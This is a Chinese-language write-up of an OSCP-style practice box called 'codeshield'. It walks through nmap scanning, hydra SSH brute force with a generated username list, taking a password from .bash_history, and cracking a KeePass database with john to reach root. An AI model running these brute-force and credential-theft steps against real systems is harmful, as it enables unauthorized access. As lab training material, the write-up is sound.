OSCP 靶场
靶场介绍
codeshield |
easy |
信息收集、密码制作、hydra爆破、凭据收集、kdbx文件爆破、keepassxc使用 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -T4 192.168.1.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-03 05:15 EST
Nmap scan report for 192.168.1.100
Host is up (0.00082s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http nginx
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd (Ubuntu)
443/tcp open ssl/http nginx
465/tcp open ssl/smtp Postfix smtpd
587/tcp open smtp Postfix smtpd
993/tcp open imaps?
995/tcp open pop3s?
2222/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3389/tcp open ms-wbt-server xrdp
22222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:61:49:1F (Oracle VirtualBox virtual NIC)
Service Info: Hosts: -mail.codeshield.hmv, mail.codeshield.hmv; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.30 seconds
目录扫描
dirb https://192.168.1.100
权限获取
从ftp 中获取pdf,pdf 里面存在密码。
从网站中找用户名制作字典,然后 后台和ssh 进行爆破
angelina johnson
john doe
bob watson
jennifer cruise
kevin valdez
jessica carlson
mohammed mansour
xian tan
annabella cocci
thomas mitchell
patrick early
获取用户名后使用脚本生成字典
https://github.com/w0Tx/generate-ad-username
hydra -L users.txt -P pass.txt ssh://192.168.1.100 -s 22222
权限提升
从valdezk 家目录下找到一个隐藏目录,发现存在密码
一个个尝试成功登录到mithchellt 用户,成功获取第一个flag
在bash_histrory 历史记录中找到earlyp 用户的密码,尝试登录成功。
mitchellt@codeshield:~$ cat .bash_history
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining ."
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining /tmp"
cp -r /tmp/mining .
ls
cd mining/
ls
exit
mitchellt@codeshield:~$ su earlyp
Password:
earlyp@codeshield:/home/mitchellt$ ls
在文档目录下发现存在一个加密的kdbx文件,下载后对其进行爆破
earlyp@codeshield:~/Documents$ ls -all
total 12
drwxr-xr-x 2 earlyp earlyp 4096 Aug 28 2023 .
drwxr-x--- 19 earlyp earlyp 4096 Aug 29 2023 ..
-rw------- 1 earlyp earlyp 1918 Aug 28 2023 Passwords.kdbx
earlyp@codeshield:~/Documents$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.103 - - [03/Mar/2024 14:58:21] "GET / HTTP/1.1" 200 -
192.168.1.103 - - [03/Mar/2024 14:58:25] "GET /Passwords.kdbx HTTP/1.1" 200 -
这里需要拿之前制作的字典才能爆破成功。
root㉿kali)-[~/下载]
└─# keepass2john Passwords.kdbx > hash
┌──(root㉿kali)-[~/下载]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
──(root㉿kali)-[~/下载]
└─# john hash --wordlist=users.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 3225806 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mandalorian (Passwords)
1g 0:00:00:24 DONE (2024-03-03 10:09) 0.04110g/s 1.972p/s 1.972c/s 1.972C/s carlson.jessica..moh-man
Use the "--show" option to display all of the cracked passwords reliably
获取密码后,读取数据库文件成功获取root 登录密码
https://app.keeweb.info
我们也可以使用keepassxc 工具打开数据库文件
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】codeshield
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论